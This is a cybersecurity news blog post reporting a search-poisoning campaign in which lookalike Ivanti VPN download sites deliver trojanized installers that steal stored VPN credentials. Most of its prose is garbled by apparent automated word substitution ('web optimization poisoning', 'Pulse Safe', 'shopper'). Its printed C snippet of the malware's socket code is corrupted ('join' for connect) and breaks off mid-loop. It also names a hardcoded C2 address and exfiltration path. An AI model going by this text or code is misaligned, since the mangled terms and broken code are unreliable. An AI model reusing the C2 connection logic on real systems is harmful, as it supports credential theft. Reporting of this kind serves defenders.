Skip to content
  • Blog Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form

Beware of Malicious Ivanti VPN Client Sites in Google Search That Delivers Malware

Posted on October 16, 2025October 16, 2025 By CWS

An aggressive web optimization poisoning marketing campaign has surfaced in early October 2025, preying on customers trying to find the authentic Ivanti Pulse Safe VPN shopper.

Attackers have registered lookalike domains comparable to ivanti-pulsesecure.com and ivanti-secure-access.org to host trojanized installers that seem official.

Unsuspecting victims clicking on high search outcomes are redirected to those malicious websites, the place a signed MSI file is obtainable for obtain underneath the guise of Ivanti’s Safe Entry Consumer.

The trojanized installer carries a credential-stealing DLL, designed to reap saved VPN connection particulars and exfiltrate them to a C2 server hosted on Microsoft Azure infrastructure.

Instance of Bing search outcomes with a poisoned web site (Supply – Zscaler)

Zscaler researchers famous a classy referrer-based content material supply tactic utilized by the phishing domains. When accessed instantly in a browser, the websites show benign content material with none obtain hyperlinks, evading fast detection by analysts and safety scanners.

Solely customers arriving by way of search engine referrals—notably from Bing—are proven the malicious obtain button, exploiting the HTTP Referrer header to cloak the true intent of the pages.

As soon as downloaded, the MSI installer drops two malicious DLLs—dwmapi.dll and pulseextension.dll—signed by a authentic certificates authority to additional bypass safety controls.

The risk actor’s faux Ivanti Pulse Safe obtain web site (Supply – Zscaler)

These DLLs embed a sequence of routines to find and parse the Ivanti connection retailer (connectionstore.dat), extracting saved URIs and credentials.

Delving into the an infection mechanism reveals how the malware establishes persistence and stealth. Upon execution, the trojanized DLL initiates a community handshake with a hardcoded IP deal with within the Azure vary (4.239.95.1) on port 8080.

The next C code snippet illustrates the socket setup and knowledge change routine:-

WSADATA was;
WSAStartup(MAKEWORD(2,2), &wsa);
int sock = socket(AF_INET, SOCK_STREAM, 0);
struct sockaddr_in addr = {0};
addr.sin_family = AF_INET;
addr.sin_port = htons(8080);
inet_pton(AF_INET, “4.239.95.1”, &addr.sin_addr);
join(sock, (struct sockaddr*)&addr, sizeof(addr));
// Obtain 48 bytes
recv(sock, buf, 0x30, 0);
// XOR deobfuscation
for(int i=0;i

Reverse-engineered code displaying community communication logic (Supply – Zscaler)

After the preliminary handshake and XOR-based deobfuscation routine, the malware transmits stolen VPN credentials in an HTTP POST request to the trail /incomeshit, a colloquial label for exfiltration channels.

As a result of the IP resides inside Microsoft Azure’s vary, safety groups might overlook these connections as benign cloud visitors.

By masquerading as trusted software program and incorporating superior evasion strategies, this marketing campaign demonstrates the efficiency of search engine poisoning as an preliminary entry vector.

Organizations ought to validate any Ivanti installer checksums, monitor outbound connections to unfamiliar Azure IPs on port 8080, and educate customers on verifying official obtain sources.

Steady risk attempting to find referrer-based anomalies stays important to thwarting these stealthy assaults.

Comply with us on Google Information, LinkedIn, and X to Get Extra On the spot Updates, Set CSN as a Most popular Supply in Google.

Cyber Security News Tags:Beware, Client, Delivers, Google, Ivanti, Malicious, Malware, Search, Sites, VPN

Post navigation

Previous Post: Cisco Routers Hacked for Rootkit Deployment
Next Post: Hackers Deploy Linux Rootkits via Cisco SNMP Flaw in “Zero Disco’ Attacks

Related Posts

North Korean Hackers Using Fake Zoom Invites to Attack Crypto Startups Cyber Security News
Lenovo Protection Driver Vulnerability Let Attackers Escalate Privilege and Execute Arbitrary Code Cyber Security News
12 Best Infrastructure Monitoring Tools in 2025 Cyber Security News
Pakistani Actors Built 300+ Cracking Websites Used to Deliver Info-Stealer Malware Cyber Security News
Top 10 Best Deception Tools in 2025 Cyber Security News
Best Network Security Solutions for CSO Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • Microsoft: Russia, China Increasingly Using AI to Escalate Cyberattacks on the US
  • Microsoft Windows 11 October Update Breaks Localhost (127.0.0.1) Connections
  • Hackers Using TikTok Videos to Deploy Self-Compiling Malware That Leverages PowerShell for Execution
  • Threat Actors Leveraging ClickFake Interview Attack to Deploy OtterCandy Malware
  • Hackers Using AI to Automate Vulnerability Discovery and Malware Generation

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • October 2025
  • September 2025
  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • Microsoft: Russia, China Increasingly Using AI to Escalate Cyberattacks on the US
  • Microsoft Windows 11 October Update Breaks Localhost (127.0.0.1) Connections
  • Hackers Using TikTok Videos to Deploy Self-Compiling Malware That Leverages PowerShell for Execution
  • Threat Actors Leveraging ClickFake Interview Attack to Deploy OtterCandy Malware
  • Hackers Using AI to Automate Vulnerability Discovery and Malware Generation

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News